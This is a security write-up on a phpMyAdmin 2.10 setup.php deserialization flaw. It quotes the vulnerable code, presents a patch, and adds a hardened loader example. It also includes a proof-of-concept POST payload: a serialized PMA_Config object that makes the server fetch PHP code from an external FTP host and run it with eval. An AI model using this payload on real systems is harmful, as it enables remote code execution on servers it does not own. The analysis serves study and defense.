phpMyAdmin /scripts/setup.php Execute Arbitrary PHP Code Via

Source: Internet
Author: User

Directory

1. Vulnerability description
2. Vulnerability trigger conditions
3. Impact scope
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking

1. Vulnerability description

The vulnerability is summarized as follows:

1. "/scripts/setup.php" receives serialized POST data sent by the user (the token must be obtained dynamically):

    action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}

2. "/scripts/setup.php" deserializes $_POST['configuration']. During PHP deserialization the program does not check the raw input for malicious content at all.

3. A hacker can therefore inject a "serialized PMA_Config object" into the POST data. When setup.php deserializes the "serialized PMA_Config object", it "re-initializes" the object, that is, it calls its constructor:

    function __construct($source = null)
    {
        $this->settings = array();

        // functions need to refresh in case of config file changed goes in
        // PMA_Config::load()
        $this->load($source);

        // other settings, independant from config file, comes in
        $this->checkSystem();

        $this->checkIsHttps();
    }

4. The PMA_Config constructor re-introduces the configuration file named by "$source". After the object is re-initialized this "$source" is read back, and eval is run to register the configuration file's variables in the local scope:

    function load($source = null)
    {
        $this->loadDefaults();

        if (null !== $source) {
            $this->setSource($source);
        }

        if (!$this->checkConfigSource()) {
            return false;
        }

        $cfg = array();

        /**
         * Parses the configuration file
         */
        $old_error_reporting = error_reporting(0);
        // use eval to introduce the external configuration file
        if (function_exists('file_get_contents')) {
            $eval_result = eval('?>' . trim(file_get_contents($this->getSource())));
        } else {
            $eval_result = eval('?>' . trim(implode("\n", file($this->getSource()))));
        }
        error_reporting($old_error_reporting);

        if ($eval_result === false) {
            $this->error_config_file = true;
        } else {
            $this->error_config_file = false;
            $this->source_mtime = filemtime($this->getSource());
        }
        ...

The end result is that the program introduces the PHP code from the external file injected by the hacker and runs it with eval, resulting in RCE.

Relevant Link:

http://php.net/manual/zh/function.unserialize.php
http://drops.wooyun.org/papers/596
http://drops.wooyun.org/tips/3909
http://blog.csdn.net/cnbird2008/article/details/7491216


2. Vulnerability trigger conditions

0x1: POC

Token needs to be dynamically obtained

1. POST http://localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup.php

2. configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}
   /* the source is an external text file containing native PHP code */



3. Scope of impact

1. phpMyAdmin 2.10
2. <= phpMyAdmin 2.10

4. Vulnerability code analysis

0x1: PHP serialize & unserialize

For more information about the security issues of PHP serialization and deserialization, see this other article:

http://www.cnblogs.com/LittleHann/p/4242535.html

0x2: "/scripts/setup.php"

    if (isset($_POST['configuration']) && $action != 'clear') {
        // Grab previous configuration, if it should not be cleared
        $configuration = unserialize($_POST['configuration']);
    } else {
        // Start with empty configuration
        $configuration = array();
    }

The root cause of the vulnerability is that the program trusts the external data sent by the user and deserializes it directly, resulting in "object injection". A hacker injects a PMA_Config object, a class that already exists in the code space; during deserialization PHP automatically calls the object's __wakeup function. In __wakeup, the externally supplied $source parameter is used as the source of the configuration file, which is then pulled into the local code space with eval.

0x3: \libraries\Config.class.php

    /**
     * Re-init object after loading from session file
     * checks config file for changes and relaods if neccessary
     */
    function __wakeup()
    {
        // when __wakeup() is executed, $source has already been set to the external $source parameter
        if (!$this->checkConfigSource()
            || $this->source_mtime !== filemtime($this->getSource())
            || $this->default_source_mtime !== filemtime($this->default_source)
            || $this->error_config_file
            || $this->error_config_default_file) {
            $this->settings = array();
            $this->load();
            $this->checkSystem();
        }

        // check for https needs to be done everytime,
        // as https and http uses same session so this info can not be stored
        // in session
        $this->checkIsHttps();

        $this->checkCollationConnection();
        $this->checkFontsize();
    }


5. Defense methods

0x1: Apply Patch

    if (isset($_POST['configuration']) && $action != 'clear') {
        $configuration = array();
        // protocol matching is case-insensitive (stripos); use !== because
        // strpos()/stripos() may legitimately return position 0
        if ((strpos($_POST['configuration'], "PMA_Config") !== false)
            && ((stripos($_POST['configuration'], "ftp://") !== false)
                || (stripos($_POST['configuration'], "http://") !== false))) {
            $configuration = array();
        } else {
            // Grab previous configuration, if it should not be cleared
            $configuration = unserialize($_POST['configuration']);
        }
    } else {
        // Start with empty configuration
        $configuration = array();
    }
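The following PHP is an added example, not code from phpMyAdmin and not the author's patch above. It illustrates the two points made in sections 4 and 5: that unserialize() revives an injected object and fires its __wakeup() without ever running the constructor, and that a loader which only ever accepts arrays of scalars is a stronger fix than blacklisting protocol names in the serialized string. DemoConfig is a hypothetical stand-in for PMA_Config, safe_unserialize_config() and only_scalars_and_arrays() are names chosen here, and the inputs are constructed:

```php
<?php
// Added example (not phpMyAdmin code). DemoConfig is a hypothetical
// stand-in for PMA_Config: it records whether it was revived by unserialize().
class DemoConfig
{
    public $source = 'config.inc.php';
    public static $wakeupCalls = 0;

    public function __construct()
    {
        // unserialize() never runs this; only "new" does.
    }

    public function __wakeup()
    {
        // In the real PMA_Config this is where load() -> eval() would read
        // $this->source. Here we only count that the object was revived.
        self::$wakeupCalls++;
    }
}

/**
 * Deserialize a configuration blob that may only contain arrays and scalars.
 * Returns the array, or null if the data is malformed or smuggles an object.
 */
function safe_unserialize_config($data)
{
    if (!is_string($data)) {
        return null;
    }
    // Pre-check on the wire format: any object token (O:len:" or C:len:")
    // is refused before unserialize() gets a chance to revive it. This is
    // what protects PHP 5, where no allowed_classes option exists.
    if (preg_match('/(^|[;{])[OC]:\d+:"/', $data)) {
        return null;
    }
    if (PHP_VERSION_ID >= 70000) {
        // PHP >= 7.0: objects become __PHP_Incomplete_Class, so no
        // __wakeup()/__destruct() of an application class can run.
        $value = @unserialize($data, array('allowed_classes' => false));
    } else {
        $value = @unserialize($data);   // notice on malformed input suppressed
    }
    // Structural allow-list: the result must be an array tree of scalars.
    if (!is_array($value) || !only_scalars_and_arrays($value)) {
        return null;
    }
    return $value;
}

/** Recursive check that no object appears anywhere in the value. */
function only_scalars_and_arrays($value)
{
    if (is_array($value)) {
        foreach ($value as $v) {
            if (!only_scalars_and_arrays($v)) {
                return false;
            }
        }
        return true;
    }
    return is_scalar($value) || $value === null;
}

// --- constructed inputs, not captured traffic ---
$benign = serialize(array('Servers' => array(1 => array('host' => 'localhost'))));

$obj = new DemoConfig();
$obj->source = 'ftp://example.invalid/x';   // placeholder for a remote file
$injected = serialize(array($obj));          // same shape as the page's payload

// 1) The setup.php pattern: the nested object is revived and __wakeup() fires.
unserialize($injected);
echo "plain unserialize(): __wakeup calls = " . DemoConfig::$wakeupCalls . "\n";

// 2) The hardened loader: the benign array is accepted, the injected object
//    is refused at the pre-check, and the __wakeup counter does not move.
var_dump(safe_unserialize_config($benign));
var_dump(safe_unserialize_config($injected));
echo "safe loader: __wakeup calls = " . DemoConfig::$wakeupCalls . "\n";
```

The design point is that the string blacklist in the patch above keys on two protocol names, while the loader here keys on the one property a configuration blob can never legitimately have, an object. Where a newer phpMyAdmin setup stores the configuration in the session rather than round-tripping it through the client, even this is unnecessary.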

6. Attack and defense thinking

Copyright (c) 2014 LittleHann All rights reserved
